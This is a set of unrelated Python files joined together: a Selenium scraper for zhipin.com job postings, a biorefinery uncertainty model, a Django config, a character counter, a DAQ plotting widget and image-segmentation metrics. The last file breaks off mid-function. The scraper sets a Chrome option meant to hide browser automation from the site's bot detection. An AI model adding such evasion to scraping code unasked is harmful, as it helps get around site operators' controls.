    """Scrapes job postings from zhipin.com (BOSS直聘) into MongoDB."""

    def __init__(self):
        # Browser options: this setting prevents the site's JS from
        # detecting that the browser is driven by webdriver.
        options = webdriver.ChromeOptions()
        options.add_experimental_option('excludeSwitches', ['enable-automation'])
        # First browser (with the options above), used to collect job links.
        # NOTE(review): passing the driver path positionally is deprecated
        # in Selenium 4 — confirm the pinned Selenium version.
        self.chrome = webdriver.Chrome(r'E:\chromedriver.exe', options=options)
        # Second browser, used to visit the job detail pages.
        self.chrome2 = webdriver.Chrome(r'E:\chromedriver.exe', options=options)
        # MongoDB collection used for storage.
        self.coll = MongoClient(host="localhost", port=27017).Spider.BossJobs
        # TTL index: documents expire 259200 s (3 days) after WriteTime.
        self.coll.create_index([('WriteTime', 1)], expireAfterSeconds=259200)

    def write_item(self, item):
        """Timestamp an item and insert it into the collection."""
        item['WriteTime'] = datetime.utcnow()
        self.coll.insert_one(item)
        print(f'>>>[{item["Name"]}]写入成功')

    def job_detail(self, url):
        """Scrape one job detail page, skipping URLs already stored."""
        # Skip if this URL was already scraped (message: "already crawled,
        # skipping").
        if self.coll.find_one({'URL': url}):
            print('已爬取,跳过: ', url)
            return
        # Fetch the detail-page data.
        self.chrome2.get(url)
        item = {}
        item['URL'] = self.chrome2.current_url  # link
        item['Name'] = self.chrome2.find_element_by_tag_name('h1').text  # job title
        item['Salary'] = self.chrome2.find_element_by_class_name('salary').text  # salary
        item['Info'] = self.chrome2.find_element_by_xpath('//div[@class="job-banner"]//p').text  # city, experience, education
        tags_ls = self.chrome2.find_elements_by_xpath('//div[@class="info-primary"]//div[@class="job-tags"]/span')
        item['Tags'] = [tag.text for tag in tags_ls]  # job tags
        item['Description'] = self.chrome2.find_element_by_xpath(
            '//div[@class="job-sec"]/div[@class="text"]').text  # job description
        item['Company'] = self.chrome2.find_element_by_xpath('//div[@class="company-info"]/a[1]').get_attribute(
            'title').split()[0]  # company name
        item['UpdateTime'] = self.chrome2.find_elements_by_class_name('gray')[0].text[4:]  # update time
        self.write_item(item)

    def run(self, job):
        """Entry point: search for `job` and collect every posting's URL."""
        self.chrome.get('https://www.zhipin.com')
        # Type the keyword into the search box.
        self.chrome.find_element_by_name("query").send_keys(job)
        # Press Enter to trigger the search.
        ActionChains(self.chrome).key_down(Keys.ENTER).key_up(Keys.ENTER).perform()
        while 1:
            # Grab all job postings on the current results page.
            job_ls = self.chrome.find_elements_by_xpath('//div[@class="info-primary"]/h3/a')
            # Extract the detail-page links.
            job_url_ls = [job.get_attribute('href') for job in job_ls]
            for url in job_url_ls:
                # Hand each detail link to job_detail().
                self.job_detail(url)
            # Scroll to the bottom of the page.
            self.chrome.execute_script('window.scrollTo(0,document.body.scrollHeight);')
            # Locate the "next page" button.
            next_page = self.chrome.find_element_by_css_selector('a.next')
            if 'disable' in next_page.get_attribute('class'):
                # 'disable' in the class means this is the last page.
                break
            # Otherwise click through to the next page.
            next_page.click()

    def __del__(self):
        # Reached once the crawl finished; close both browsers.
        self.chrome.close()  # close browser 1
        self.chrome2.close()  # close browser 2
        print('>>>>[Well Done]')
if __name__ == '__main__':
    bj = BossJob()
    # Search keyword: '爬虫' ("crawler" jobs).
    bj.run('爬虫')
|
# -*- coding: utf-8 -*-
"""
Created on Sun May 26 11:21:31 2019
@author: yoelr
"""
from biosteam.evaluation import Model, Metric
from biosteam.evaluation.evaluation_tools import triang
import biosteam.biorefineries.lipidcane as lc
import numpy as np
__all__ = ('lipidcane_model', 'lipidcane_model_with_lipidfraction_parameter')

tea = lc.lipidcane_tea
ethanol = lc.system.ethanol.ethanol
biodiesel = lc.system.biodiesel.biodiesel
lipid_cane = lc.system.pretreatment.lipid_cane

# tea.production_cost(products) returns (biodiesel, ethanol) costs in one
# call; the ethanol value is stashed in a one-element list so its metric
# can reuse it without recomputing.
etoh_prodcost = [0]
products = (biodiesel, ethanol)
def get_biodiesel_prodcost():
    """Return the biodiesel production cost; caches the ethanol cost."""
    bd, etoh_prodcost[0] = tea.production_cost(products)
    return bd
get_etoh_prodcost = lambda: etoh_prodcost[0]
get_FCI = lambda: tea._FCI_cached

# Same caching pattern for annual production (kg/yr from kg/hr rates).
etoh_prod = [0]
def get_biodiesel_prod():
    """Return annual biodiesel production; caches the ethanol figure."""
    bd, etoh_prod[0] = np.array([biodiesel.massnet, ethanol.massnet]) * tea._annual_factor
    return bd
get_etoh_prod = lambda: etoh_prod[0]

BT = lc.system.biorefinery.BT
lc_sys = lc.lipidcane_sys
def get_steam():
    """Annual steam use in metric tons (18.01528 g/mol water, /1000 kg->MT)."""
    return sum([i.flow for i in BT.steam_utilities])*18.01528*tea._annual_factor/1000

# Power utilities of every unit except the boiler-turbogenerator itself.
power_utils = ([i._power_utility for i in lc_sys.units if (i._power_utility and i is not BT)])
excess_electricity = [0]
def get_consumed_electricity():
    """Annual consumed electricity (MWhr/yr); caches the excess figure."""
    factor = tea._annual_factor/1000
    # BT's rate is negative for generation, hence the sign flip.
    electricity_generated = -BT._power_utility.rate * factor
    consumed_electricity = sum([i.rate for i in power_utils]) * factor
    excess_electricity[0] = electricity_generated - consumed_electricity
    return consumed_electricity
get_excess_electricity = lambda: excess_electricity[0]

# Metric order matters: the cached getters (ethanol cost/production,
# excess electricity) must run after the metric that fills their cache.
metrics = (Metric('Internal rate of return', lc.lipidcane_tea.solve_IRR),
           Metric('Biodiesel production cost', get_biodiesel_prodcost, 'USD/yr'),
           Metric('Ethanol production cost', get_etoh_prodcost, 'USD/yr'),
           Metric('Fixed capital investment', get_FCI, 'USD'),
           Metric('Biodiesel production', get_biodiesel_prod, 'kg/hr'),
           Metric('Ethanol production', get_etoh_prod, 'kg/hr'),
           Metric('Steam', get_steam, 'MT/yr'),
           Metric('Consumed electricity', get_consumed_electricity, 'MWhr/yr'),
           Metric('Excess electricity', get_excess_electricity, 'MWhr/yr'))

lipidcane_model = Model(lc_sys, metrics)
lipidcane_model.load_default_parameters(lipid_cane)
# Decorator used to register uncertainty parameters on the model.
param = lipidcane_model.parameter

# Lipid extraction rate
Mill = lc.system.pretreatment.U201
Mill_split = Mill.split
Lipid_index = Mill.outs[0].index('Lipid')
@param(element=Mill,
       distribution=triang(Mill_split[Lipid_index]),
       kind='coupled')
def set_lipid_extraction_rate(lipid_extraction_rate):
    Mill_split[Lipid_index] = lipid_extraction_rate

# Transesterification efficiency (both tanks)
R401 = lc.system.biodiesel.R401
@param(element=R401, distribution=triang(R401.efficiency), kind='coupled')
def set_transesterification_401_efficiency(efficiency):
    R401.efficiency = efficiency

R402 = lc.system.biodiesel.R402
@param(element=R402, distribution=triang(R402.efficiency), kind='coupled')
def set_transesterification_402_efficiency(efficiency):
    R402.efficiency = efficiency

# Fermentation efficiency
fermentation = lc.system.ethanol.R301
@param(element=fermentation, distribution=triang(fermentation.efficiency),
       kind='coupled')
def set_fermentation_efficiency(efficiency):
    fermentation.efficiency = efficiency

# Boiler efficiency
BT = lc.system.biorefinery.BT
@param(element=BT, distribution=triang(BT.boiler_efficiency))
def set_boiler_efficiency(boiler_efficiency):
    BT.boiler_efficiency = boiler_efficiency
# Turbogenerator efficiency
@param(element=BT, distribution=triang(BT.turbogenerator_efficiency))
def set_turbogenerator_efficiency(turbo_generator_efficiency):
    """Set the boiler-turbogenerator's turbogenerator efficiency.

    Fix: assign to ``turbogenerator_efficiency`` — the attribute the
    distribution above reads. The previous code wrote to
    ``turbo_generator_efficiency`` (note the extra underscore), which
    created a new, unused attribute, so the sampled parameter silently
    had no effect on the simulation.
    """
    BT.turbogenerator_efficiency = turbo_generator_efficiency
# RVF separation: one retention value is applied to every solid species.
rvf = lc.system.pretreatment.C202
@param(element=rvf, distribution=triang(rvf.split['Lignin']),
       kind='coupled')
def set_rvf_solids_retention(solids_retention):
    rvf.split['Lignin', 'CaO', 'Ash', 'Cellulose', 'Hemicellulose'] = solids_retention

# Variant of the model that additionally samples the feed lipid fraction.
lipidcane_model_with_lipidfraction_parameter = lipidcane_model.copy()
lipidcane_model_with_lipidfraction_parameter.parameter(lc.set_lipid_fraction,
                                                       element=lipid_cane,
                                                       name='Lipid fraction',
                                                       distribution=triang(0.05))
|
"""PurbeurreConfig
"""
from django.apps import AppConfig
class PurbeurreConfig(AppConfig):
    """Django application configuration for the ``purbeurre`` app.

    Registers the app under the name 'purbeurre' so Django can discover
    it in INSTALLED_APPS.
    """
    name = 'purbeurre'
|
"""
AA, February 2021
Assignment 3: Contagem dos Itens Mais Frequentes
Author: Ana Sofia Fernandes, 88739
"""
from Reader.File_reader import File_reader
from collections import Counter
import time
from tabulate import tabulate
##Class that acts as an exact counter and counts the occurences of each char in file
class Exact_counter:
    """Exact counter: tallies the occurrences of every char in a file."""

    def __init__(self, file_to_read):
        # {char: count}, kept in descending count order after count_chars().
        self.char_counting_dict = {}
        self.file_reader = File_reader(file_to_read)
        # Seconds spent inside the counting loop (set by count_chars()).
        self.execution_time = 0

    def count_chars(self):
        """
        Count the occurrences of each char in the file and store them,
        sorted by descending count, in ``self.char_counting_dict``.
        Only the counting loop itself is timed.
        """
        self.file_reader.read_file()
        chars = self.file_reader.get_final_chars()
        start_time = time.time()
        # Accumulate onto the existing dict so repeated calls keep adding up.
        for ch in chars:
            self.char_counting_dict[ch] = self.char_counting_dict.get(ch, 0) + 1
        self.execution_time = time.time() - start_time
        ordered = sorted(self.char_counting_dict.items(),
                         key=lambda kv: kv[1], reverse=True)
        self.char_counting_dict = {ch: cnt for ch, cnt in ordered}

    def write_final_counting(self, output_file):
        """
        Write the final counting (in descending order) to ``output_file``.
        """
        with open(output_file, "w") as out:
            out.write(f"\nNumber of chars counted: {len(self.char_counting_dict.keys())}\n")
            out.write("\nFinal char counting:\n")
            for ch, cnt in self.char_counting_dict.items():
                out.write(f"\n{ch} -> {cnt}")

    def write_top_20_chars(self, output_file):
        """
        Write a table of the top 20 chars to ``output_file``.
        """
        headers = ["Char", "Couting"]
        rows = [[ch, cnt] for ch, cnt in self.get_top_20_chars()]
        with open(output_file, "w") as out:
            out.write("--- Top 20 chars - exact counter: \n\n")
            out.write(tabulate(rows, headers=headers))

    def get_final_counting(self):
        """
        Getter for the dictionary with the final counting.
        """
        return self.char_counting_dict

    def get_top_20_chars(self):
        """
        Getter for the 20 most counted chars as (char, count) pairs.
        """
        return Counter(self.char_counting_dict).most_common(20)

    def get_total_counted_chars(self):
        """
        Getter for the total number of chars counted.
        """
        return sum(self.char_counting_dict.values())

    def get_execution_time(self):
        """
        Getter for the counting time, rounded to 3 decimal places.
        """
        return round(self.execution_time, 3)
import warnings
from PySide2.QtCore import Qt, QObject, Slot, Signal, Property
from PySide2.QtWidgets import QWidget, QVBoxLayout, QGridLayout, QButtonGroup, QCheckBox
import pyqtgraph as pg
import numpy as np
import topside as top
def trim_earlier(array, t):
    """
    Return the suffix of an array starting at the first element that is
    greater than or equal to a reference value.

    Parameters
    ----------
    array: list or numpy.ndarray
        The array to trim. Must be monotonically increasing.
    t: number
        The reference value used for trimming the array.

    For example:

    trim_earlier([1, 3, 5], 2) == [3, 5]
    trim_earlier([4, 6, 8], 6) == [6, 8]
    trim_earlier([10, 20, 30], 40) == []
    """
    # Index of the first element >= t, or len(array) if none qualifies
    # (in which case the returned slice is empty).
    cut = next((k for k, v in enumerate(array) if v >= t), len(array))
    return array[cut:]
class DAQBridge(QObject):
    """
    Collects per-channel time series from the plumbing bridge and
    re-emits them, trimmed to a rolling time window, for plotting.
    """

    channelAdded = Signal(str)
    channelRemoved = Signal(str)
    dataUpdated = Signal(str, np.ndarray, np.ndarray)  # channel name, time vals, data vals

    def __init__(self, plumbing_bridge):
        QObject.__init__(self)
        plumbing_bridge.dataUpdated.connect(self.update)
        plumbing_bridge.engineLoaded.connect(self.clear)
        self.data_values = {}  # {channel_name: np.ndarray}
        self.times = np.array([])
        self.window_size_s = 10  # TODO(jacob): Add a UI field for this.

    @Slot()
    def clear(self):
        """Remove every tracked channel and reset the time axis."""
        channels = list(self.data_values.keys())
        for channel in channels:
            self.removeChannel(channel)
        self.times = np.array([])

    @Slot(str)
    def addChannel(self, channel_name):
        """Start tracking a channel and announce it via channelAdded."""
        if channel_name in self.data_values:
            # This should never happen, but we'll put a warning on it
            # just in case.
            warnings.warn('attempted to add a duplicate channel to DAQ')
            return
        self.data_values[channel_name] = np.array([])
        self.channelAdded.emit(channel_name)

    @Slot(str)
    def removeChannel(self, channel_name):
        """Stop tracking a channel and announce it via channelRemoved."""
        del self.data_values[channel_name]
        self.channelRemoved.emit(channel_name)

    @Slot(dict, np.ndarray)
    def update(self, datapoints, times):
        """
        Update the tracked data channels with new data.

        This function will automatically trim the existing data to
        remain within the window size. For example, if the window size
        is 10s, we have data from 12s to 22s, and we get new data from
        22s to 25s, we will end up with data from 15s to 25s after
        calling `update`.

        Parameters
        ----------
        datapoints: dict
            `datapoints` is a dict of the form `{channel: values}`,
            where `channel` is a string corresponding to a tracked
            channel name and `values` is a NumPy array of new data
            values.
        times: np.ndarray
            `times` is an array of the form `[t1, t2, t3]`. It is
            expected to be the same length as each `values` list. For
            any channel in `datapoints`, `values[i]` is the value of the
            channel at time `times[i]`.
        """
        if len(times) == 0:
            return
        if len(self.times) > 0 and top.micros_to_s(times[0]) < self.times[-1]:
            # We stepped back in time, clear all existing time values.
            # We don't need to clear data_values since they'll
            # automatically be trimmed to the relevant data later on.
            self.times = np.array([])
        # Keep only the last window_size_s seconds of time values.
        trim_time = top.micros_to_s(times[-1]) - self.window_size_s
        appended = np.append(self.times, top.micros_to_s(times))
        self.times = trim_earlier(appended, trim_time)
        for channel, values in datapoints.items():
            if channel in self.data_values:
                extended = np.append(self.data_values[channel], values)
                num_vals = min(len(self.times), len(extended))
                # TODO(jacob): We trim the arrays here to make them the
                # same length, but it could be nicer to front-pad with
                # NaNs so that the time axis is the same across all of
                # the plots. PyQtGraph fixed a bug related to this
                # recently, but the commit hasn't made it into a new
                # release yet.
                self.data_values[channel] = extended[-num_vals:]
                times_to_plot = self.times[-num_vals:]
                self.dataUpdated.emit(channel, times_to_plot, self.data_values[channel])
class DAQLayout(QWidget):
    """
    Widget stacking one live plot per selected channel above a grid of
    channel-selector checkboxes.
    """

    def __init__(self):
        QWidget.__init__(self)
        self.setLayout(QVBoxLayout())
        self.plot_items = {}  # {channel_name: PlotItem}
        self.plot_curves = {}  # {channel_name: PlotDataItem}
        self.next_row = 0
        self.pen = pg.mkPen(color='g', width=1)
        self.graphs = pg.GraphicsLayoutWidget()
        self.graphs.ci.setBorder('w', width=2)
        self.layout().addWidget(self.graphs)
        self.channel_selector = ChannelSelector()
        self.layout().addWidget(self.channel_selector)

    @Slot()
    def clear(self):
        """Remove every plot from the layout."""
        channels = list(self.plot_items.keys())
        for channel in channels:
            self.removeChannel(channel)

    @Slot(str)
    def addChannel(self, channel_name):
        """Add an empty, gridded plot for a newly tracked channel."""
        if channel_name in self.plot_items:
            warnings.warn('attempted to add a duplicate channel to DAQ')
            return
        plot = self.graphs.addPlot(row=self.next_row, col=0, title=channel_name)
        plot.setLimits(minYRange=2)
        plot.showGrid(x=True, y=True)
        self.plot_items[channel_name] = plot
        self.plot_curves[channel_name] = plot.plot(pen=self.pen)
        # NOTE(jacob): PyQtGraph doesn't adjust row numbers if an item
        # is deleted from the layout, so we can't simply assume that the
        # next row available is (number of plots + 1). Fortunately,
        # the actual values of the assigned row numbers don't seem to
        # matter, so we just need to make sure the "next row" is higher
        # than all of the others so far.
        self.next_row += 1

    @Slot(str)
    def removeChannel(self, channel_name):
        """Delete the plot associated with a channel, if present."""
        if channel_name in self.plot_items:
            item = self.plot_items[channel_name]
            # NOTE(jacob): For some reason, PyQtGraph doesn't properly
            # delete the border geometry for plot items when removeItem is
            # called on a GraphicsLayout (or GraphicsLayoutWidget), so we
            # need to explicitly delete it ourselves or we get weird lines
            # left on the screen. I'm considering submitting a PR to fix
            # this, if I can confirm that it's actually a bug.
            border = self.graphs.ci.itemBorders[item]
            self.graphs.ci.scene().removeItem(border)
            self.graphs.removeItem(item)
            item.deleteLater()
            del self.plot_items[channel_name]
            del self.plot_curves[channel_name]

    @Slot(str, np.ndarray, np.ndarray)
    def updateData(self, channel_name, times, data_vals):
        """Replace the plotted data for a channel with the new arrays."""
        curve = self.plot_curves[channel_name]
        curve.setData(times, data_vals)
class ChannelSelector(QWidget):
    """
    Grid of checkboxes, one per plumbing-engine node, used to choose
    which channels the DAQ should track.
    """

    channelSelected = Signal(str)
    channelDeselected = Signal(str)

    def __init__(self):
        QWidget.__init__(self)
        self.setLayout(QGridLayout())
        self.control_group = QButtonGroup()
        self.control_group.setExclusive(False)
        self.control_group.idToggled.connect(self.notifyChannel)
        self.ids_to_channels = {}  # {id: channel_name (str)}
        self.checkboxes = {}  # {channel_name: QCheckBox}
        self.next_id = 0
        # TODO(jacob): 4 columns is mostly an arbitrary choice; 5 seemed
        # too crowded, 3 seemed too empty. Ideally we'd change this
        # dynamically based on the column width.
        self.num_cols = 4

    def add_checkbox(self, channel_name):
        """Append a checkbox for channel_name to the grid."""
        if channel_name in self.checkboxes:
            warnings.warn('attempted to add a duplicate checkbox to the DAQ channel selector')
            return
        checkbox = QCheckBox(channel_name)
        self.checkboxes[channel_name] = checkbox
        # Fill the grid row by row, num_cols checkboxes per row.
        num_widgets = len(self.checkboxes)
        row = (num_widgets - 1) // self.num_cols
        col = (num_widgets - 1) % self.num_cols
        self.layout().addWidget(checkbox, row, col)
        self.control_group.addButton(checkbox, self.next_id)
        self.ids_to_channels[self.next_id] = channel_name
        self.next_id += 1

    def clear_checkboxes(self):
        """Remove and delete every checkbox."""
        for checkbox in self.checkboxes.values():
            self.control_group.removeButton(checkbox)
            self.layout().removeWidget(checkbox)
            checkbox.deleteLater()
        self.checkboxes = {}
        self.ids_to_channels = {}

    @Slot(top.PlumbingEngine)
    def updateNodeList(self, plumb):
        """Rebuild the checkbox grid from the engine's node list."""
        self.clear_checkboxes()
        for node in plumb.nodes(data=False):
            self.add_checkbox(node)

    @Slot(int)
    def notifyChannel(self, checkbox_id, is_checked):
        """Translate a checkbox toggle into a channel (de)select signal."""
        # NOTE(review): idToggled emits (int, bool) but the @Slot
        # decorator only declares the first argument — confirm intended.
        channel = self.ids_to_channels[checkbox_id]
        if is_checked:
            self.channelSelected.emit(channel)
        else:
            self.channelDeselected.emit(channel)
def make_daq_widget(daq_bridge, plumbing_bridge):
    """Construct a DAQLayout and wire it to the DAQ and plumbing bridges.

    Returns the connected DAQLayout instance.
    """
    widget = DAQLayout()

    # Data flowing from the DAQ bridge into the plots.
    daq_bridge.channelAdded.connect(widget.addChannel)
    daq_bridge.channelRemoved.connect(widget.removeChannel)
    daq_bridge.dataUpdated.connect(widget.updateData)

    # User channel selections flowing back out to the bridge, plus a
    # refresh of the selector whenever a new engine is loaded.
    selector = widget.channel_selector
    selector.channelSelected.connect(daq_bridge.addChannel)
    selector.channelDeselected.connect(daq_bridge.removeChannel)
    plumbing_bridge.engineLoaded.connect(selector.updateNodeList)

    return widget
|
def print_dictionary_values(dic):
    """Print one "My <key> is <value>" line per entry, in insertion order.

    Args:
        dic: Mapping of attribute names to values; values are converted
            with str() for display.
    """
    # .iteritems() and the statement form of print were Python 2 only.
    for key, value in dic.items():
        print(f"My {key} is {value}")


# Note: the original wrapped this call in another `print`, which would have
# printed the function's None return value; the call alone is intended.
print_dictionary_values({
    "name": "Tom",
    "age": 30,
    "country of birth": "USA",
    "favorite language": "English",
})
|
from typing import Callable, Dict, List, Optional, Tuple, Union
import numpy as np
from .binary_metrics import get_stats, iou_score
__all__ = [
"pairwise_pixel_stats",
"pairwise_object_stats",
"panoptic_quality",
"average_precision",
"aggregated_jaccard_index",
"dice2",
"iou_multiclass",
"dice_multiclass",
"f1score_multiclass",
"accuracy_multiclass",
"sensitivity_multiclass",
"specificity_multiclass",
]
def pairwise_pixel_stats(
    true: np.ndarray,
    pred: np.ndarray,
    num_classes: Optional[int] = None,
    metric_func: Optional[Callable] = None,
) -> List[np.ndarray]:
    """Compute the # of TP, FP, FN pixels for each object in a labelled/semantic mask.

    Optionally a binary metric can be computed instead of the statistics.
    At least 2x faster than computing with `np.histogram2d`.

    Parameters
    ----------
    true : np.ndarray
        Ground truth (semantic or labelled mask). Shape (H, W).
    pred : np.ndarray
        Predicted (semantic or labelled mask). Shape (H, W).
    num_classes : int, optional
        Number of classes in the dataset. If None, stats are computed for
        instances. If not None, stats are computed for classes i.e. semantic
        segmentation masks.
    metric_func : Callable, optional
        A binary metric function taking (tp, fp, fn). e.g. `iou_score` or
        `dice`.

    Returns
    -------
    List[np.ndarray]:
        A list of 2D arrays (i, j) where i corresponds to a ground
        truth label and j corresponds to a predicted label. Each value
        of the matrix is the computed statistic or metric at pos (i, j).
        By default returns the tp, fp, and fn matrices; if `metric_func`
        is given, a single-element list with the metric matrix. Returns
        an empty (falsy) list when either mask contains no labels.
        If stats are computed for instances:
            Shape: (n_labels_gt, n_labels_pred). Dtype: float64.
        If stats are computed for classes:
            Shape: (num_classes, num_classes). Dtype: float64.
    """
    if num_classes is not None:
        # Semantic mode: every class index 0..num_classes-1 gets a row/col.
        true_labels = list(range(num_classes))
        pred_labels = list(range(num_classes))
    else:
        # Instance mode: drop the first (smallest) label, assumed to be the
        # background (0). NOTE(review): if a mask contains no background
        # pixels, this drops a real instance label — confirm inputs always
        # contain background.
        true_labels = list(np.unique(true))[1:]
        pred_labels = list(np.unique(pred))[1:]

    # Binarize every label once up front; each binary mask is reused for all
    # of its overlap computations in the loop below.
    true_objects = {t: np.array(true == t, np.uint8) for t in true_labels}
    pred_objects = {p: np.array(pred == p, np.uint8) for p in pred_labels}

    # array dims
    i = len(true_labels)
    j = len(pred_labels)

    # One output matrix when computing a metric, three (tp, fp, fn) for raw
    # pixel statistics.
    ret: List[np.ndarray] = []
    if i > 0 and j > 0:
        ret.append(np.zeros((i, j), dtype=np.float64))
        if metric_func is None:
            ret.append(np.zeros((i, j), dtype=np.float64))
            ret.append(np.zeros((i, j), dtype=np.float64))

    for true_label in true_labels:
        true_obj = true_objects[true_label]

        # Only predicted labels that actually overlap this gt object can
        # produce non-zero stats, so restrict the inner loop to those.
        overlap_label = np.unique(pred[true_obj > 0])

        for pred_label in overlap_label:
            # ignore bg and empty preds in instance mode
            if pred_label == 0 and num_classes is None:
                continue

            pred_obj = pred_objects[pred_label]
            tp, fp, fn = get_stats(true_obj, pred_obj)

            # Instance labels are assumed consecutive starting at 1, so
            # label n maps to matrix index n - 1; class indices map 1:1.
            if num_classes is None:
                ix = true_label - 1
                jx = pred_label - 1
            else:
                ix = true_label
                jx = pred_label

            # compute a metric or accumulate raw stats
            if metric_func is not None:
                ret[0][ix, jx] = metric_func(tp, fp, fn)
            else:
                ret[0][ix, jx] = tp.sum()
                ret[1][ix, jx] = fp.sum()
                ret[2][ix, jx] = fn.sum()

    return ret
def pairwise_object_stats(
    matches: np.ndarray, sum_reduce: bool = True
) -> Union[Tuple[int, int, int], Tuple[np.ndarray, np.ndarray, np.ndarray]]:
    """Compute the TP, FP, FN objects from a boolean contingency table.

    Parameters
    ----------
    matches : np.ndarray
        A pairwise boolean matrix where True values at pos (i, j)
        indicate correctly detected objects for the corresponding
        labels i and j. Shape: (n_labels_gt, n_labels_pred).
    sum_reduce : bool, default=True
        Reduce the boolean index arrays by summing to get the number of
        TP, FP, and FN objects instead of the boolean masks themselves.

    Returns
    -------
    Tuple[int, int, int]:
        The number of TP objects, FP objects, and FN objects in a
        labelled mask. With ``sum_reduce=False``, boolean masks over the
        gt labels (first two values) and pred labels (third) instead.

    NOTE(review): the second value is derived from unmatched *ground-truth*
    rows and the third from unmatched *prediction* columns, which is the
    opposite of the usual FP/FN convention. Callers in this module
    (`aggregated_jaccard_index`, and `average_precision`, which swaps its
    arguments to compensate) rely on this exact ordering, so it is kept.
    """
    matches_per_pred = matches.sum(axis=0)  # gt hits for each predicted label
    matches_per_true = matches.sum(axis=1)  # pred hits for each gt label

    tp_objects = matches_per_true >= 1  # gt labels matched by >= 1 prediction
    fp_objects = matches_per_true == 0  # gt labels with no matching prediction
    fn_objects = matches_per_pred == 0  # pred labels with no matching gt

    if sum_reduce:
        tp_objects = tp_objects.sum()
        fp_objects = fp_objects.sum()
        fn_objects = fn_objects.sum()

    return tp_objects, fp_objects, fn_objects
def panoptic_quality(
    true: np.ndarray, pred: np.ndarray, thresh: float = 0.5, eps: float = 1e-8
) -> Dict[str, float]:
    """Compute the panoptic quality of a labelled mask.

    Parameters
    ----------
    true : np.ndarray
        Ground truth (labelled mask). Shape (H, W).
    pred : np.ndarray
        Predicted (labelled mask). Shape (H, W).
    thresh : float, default=0.5
        Threshold for the iou to include the prediction as TP.
    eps : float, default=1e-8
        Epsilon to avoid zero div errors.

    Returns
    -------
    Dict[str, float]:
        Dictionary containing the detection quality (dq), segmentation
        quality (sq) and panoptic quality (pq) values.
    """
    res = {"pq": 0.0, "sq": 0.0, "dq": 0.0}

    pairwise = pairwise_pixel_stats(true, pred, metric_func=iou_score)
    if not pairwise:
        return res

    iou_matrix = pairwise[0]
    matched = iou_matrix > thresh
    tp_objects, fp_objects, fn_objects = pairwise_object_stats(matched)

    res["dq"] = tp_objects / (tp_objects + 0.5 * fp_objects + 0.5 * fn_objects + eps)
    res["sq"] = iou_matrix[matched].sum() / (tp_objects + eps)
    res["pq"] = res["dq"] * res["sq"]
    return res
def average_precision(
    true: np.ndarray, pred: np.ndarray, thresh: float = 0.5, eps: float = 1e-8
) -> float:
    """Compute the average precision of a labelled mask.

    Parameters
    ----------
    true : np.ndarray
        Ground truth (labelled mask). Shape (H, W).
    pred : np.ndarray
        Predicted (labelled mask). Shape (H, W).
    thresh : float, default=0.5
        Threshold for the iou to include the prediction as TP.
    eps : float, default=1e-8
        Epsilon to avoid zero div errors.

    Returns
    -------
    float:
        The computed precision.
    """
    # The arguments are deliberately passed (pred, true): combined with the
    # axis convention of `pairwise_object_stats`, the "tp" and "fp" counts
    # then refer to matched and unmatched *predicted* labels, which is what
    # precision needs.
    pairwise = pairwise_pixel_stats(pred, true, metric_func=iou_score)
    if not pairwise:
        return 0.0

    matched = pairwise[0] > thresh
    tp_objects, fp_objects, _ = pairwise_object_stats(matched)
    return tp_objects / (tp_objects + fp_objects + eps)
def dice2(true: np.ndarray, pred: np.ndarray, eps: float = 1e-8) -> float:
    """Compute the DICE2 metric for a labelled mask.

    Parameters
    ----------
    true : np.ndarray
        Ground truth (labelled mask). Shape (H, W).
    pred : np.ndarray
        Predicted (labelled mask). Shape (H, W).
    eps : float, default=1e-8
        Epsilon to avoid zero div errors.

    Returns
    -------
    float:
        The computed dice2 metric.
    """
    stats = pairwise_pixel_stats(true, pred)
    if not stats:
        return 0.0

    tp, fp, fn = stats
    # Only the non-zero (i.e. overlapping) entries contribute.
    numerator = 2 * tp[tp > 0].sum()
    denominator = numerator + fp[fp > 0].sum() + fn[fn > 0].sum() + eps
    return numerator / denominator
def aggregated_jaccard_index(
    true: np.ndarray, pred: np.ndarray, thresh: float = 0.5, eps: float = 1e-8
) -> float:
    """Compute the aggregated jaccard index (AJI) for a labelled mask.

    Parameters
    ----------
    true : np.ndarray
        Ground truth (labelled mask). Shape (H, W).
    pred : np.ndarray
        Predicted (labelled mask). Shape (H, W).
    thresh : float, default=0.5
        Threshold for the iou to include the prediction as TP.
        NOTE(review): this parameter is currently unused by the
        implementation below — confirm whether the matching step should
        be iou-thresholded as in `panoptic_quality`.
    eps : float, default=1e-8
        Epsilon to avoid zero div errors.

    Returns
    -------
    float:
        The computed aji.
    """
    aji = 0.0
    stats = pairwise_pixel_stats(true, pred)
    if stats:
        tp, fp, fn = stats
        # Pairwise intersection/union pixel counts for every gt/pred pair.
        inter = tp
        union = tp + fp + fn
        # Get the number of pixels from the matched objects. A pair is
        # "matched" when its intersection equals its row maximum, i.e. each
        # gt label pairs with its best-overlapping prediction(s); ties yield
        # several matches per row. `initial=1e-8` keeps all-zero rows from
        # matching at intersection 0.
        matches = inter == np.amax(inter, axis=1, keepdims=True, initial=1e-8)
        inter = inter[matches].sum()
        union = union[matches].sum()
        # Get the num of pixels from the missed objects. Per
        # `pairwise_object_stats`, the 2nd mask indexes gt rows and the 3rd
        # indexes pred columns; labels are assumed consecutive from 1,
        # hence the `+ 1` to map matrix index back to label.
        _, fp_objects, fn_objects = pairwise_object_stats(matches, sum_reduce=False)
        unpaired_true_labels = np.nonzero(fp_objects)[0] + 1
        unpaired_pred_labels = np.nonzero(fn_objects)[0] + 1
        for true_id in unpaired_true_labels:
            union += (true == true_id).sum()
        for pred_id in unpaired_pred_labels:
            union += (pred == pred_id).sum()
        # compute aji
        aji = inter / (union + eps)
    return aji
def _absent_inds(true: np.ndarray, pred: np.ndarray, num_classes: int) -> np.ndarray:
    """Get the class indices that are not present in either `true` or `pred`."""
    present = np.union1d(np.unique(true), np.unique(pred))
    return np.setdiff1d(np.arange(num_classes), present)
def iou_multiclass(
    true: np.ndarray,
    pred: np.ndarray,
    num_classes: int,
    eps: float = 1e-8,
    clamp_absent: bool = True,
) -> np.ndarray:
    """Compute multi-class intersection over union for semantic segmentation masks.

    Parameters
    ----------
    true : np.ndarray
        Ground truth semantic mask. Shape (H, W).
    pred : np.ndarray
        Predicted semantic mask. Shape (H, W).
    num_classes : int
        Number of classes in the training dataset.
    eps : float, default=1e-8
        Epsilon to avoid zero div errors.
    clamp_absent : bool, default=True
        If a class is not present in either true or pred, the value of that
        index in the result array will be clamped to -1.0.

    Returns
    -------
    np.ndarray:
        Per class IoU-metrics. Shape: (num_classes,).
    """
    # Per-class TP/FP/FN pixel counts live on the diagonals of the pairwise
    # (num_classes, num_classes) statistic matrices.
    tp, fp, fn = (mat.diagonal() for mat in
